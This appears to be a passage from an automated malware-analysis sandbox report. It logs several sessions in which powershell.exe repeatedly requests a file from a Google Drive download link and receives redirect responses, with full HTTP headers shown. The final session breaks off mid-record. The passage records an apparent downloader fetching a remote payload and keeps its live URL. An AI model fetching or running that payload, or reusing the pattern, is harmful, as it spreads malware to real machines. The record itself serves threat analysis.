                9192.168.2.449747142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:46:19 UTC97OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                2024-10-01 05:46:19 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:19 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Security-Policy: script-src 'report-sample' 'nonce-fq-lvI5LES2Cy1C02ZAj-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Cross-Origin-Opener-Policy: same-origin
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                10192.168.2.449748142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:46:24 UTC97OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                2024-10-01 05:46:24 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:24 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-RPVb1cAl7V7dYVSQj_hgqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Cross-Origin-Opener-Policy: same-origin
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                11192.168.2.449750142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:46:29 UTC121OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:46:29 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:29 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: script-src 'report-sample' 'nonce-CR1rFIDzY1hYyOVBB-vpOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Cross-Origin-Opener-Policy: same-origin
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                12192.168.2.449753142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:46:34 UTC121OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:46:35 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:35 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-m6_sWImcqmY5aJygoDuirQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Cross-Origin-Opener-Policy: same-origin
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                13192.168.2.449754142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:46:39 UTC97OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                2024-10-01 05:46:40 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:40 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Security-Policy: script-src 'report-sample' 'nonce-629b_qg4LARb0MLL9nmWIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                14192.168.2.449755142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:46:44 UTC121OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:46:45 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:45 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-MZJ__5oGFMSCuQ0QujlrCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Cross-Origin-Opener-Policy: same-origin
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                15192.168.2.449756142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:46:49 UTC121OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:46:50 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:50 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-ab2vwVTNfJpo5UUQ7mdy8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Cross-Origin-Opener-Policy: same-origin
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                16192.168.2.449757142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:46:55 UTC121OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:46:55 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:55 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Security-Policy: script-src 'report-sample' 'nonce-yA4Rk4Eju8tV_VuOgayszA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                17192.168.2.449759142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:47:00 UTC97OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                2024-10-01 05:47:00 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:00 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: script-src 'report-sample' 'nonce-fBooVxGdl02CFZfpVK0NWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Cross-Origin-Opener-Policy: same-origin
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                18192.168.2.449760142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:47:05 UTC97OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                2024-10-01 05:47:05 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:05 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-30bz787RwNcuK5VtMrj7qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                19192.168.2.449761142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:47:10 UTC121OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:47:11 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:10 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: script-src 'report-sample' 'nonce-X8iq_tItZrABPDMVomidzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Cross-Origin-Opener-Policy: same-origin
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                20192.168.2.449762142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:47:15 UTC121OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:47:16 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:15 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Cross-Origin-Opener-Policy: same-origin
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Content-Security-Policy: script-src 'report-sample' 'nonce-2GcyCkDoTLDX6IbdpecL_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                21192.168.2.449764142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:47:21 UTC121OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:47:21 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:21 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-q78IHXj6e7CS5p1mDtT2dQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                22192.168.2.449765142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:47:26 UTC121OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:47:26 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:26 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: script-src 'report-sample' 'nonce-qyOMG572OKK9p7Oi0qK4bg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Cross-Origin-Opener-Policy: same-origin
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                23192.168.2.449766142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:47:32 UTC121OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:47:32 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:32 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Security-Policy: script-src 'report-sample' 'nonce-IqVkXtVctL9fH0RIby20Bg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                24192.168.2.449767142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:47:37 UTC121OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:47:37 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:37 GMT
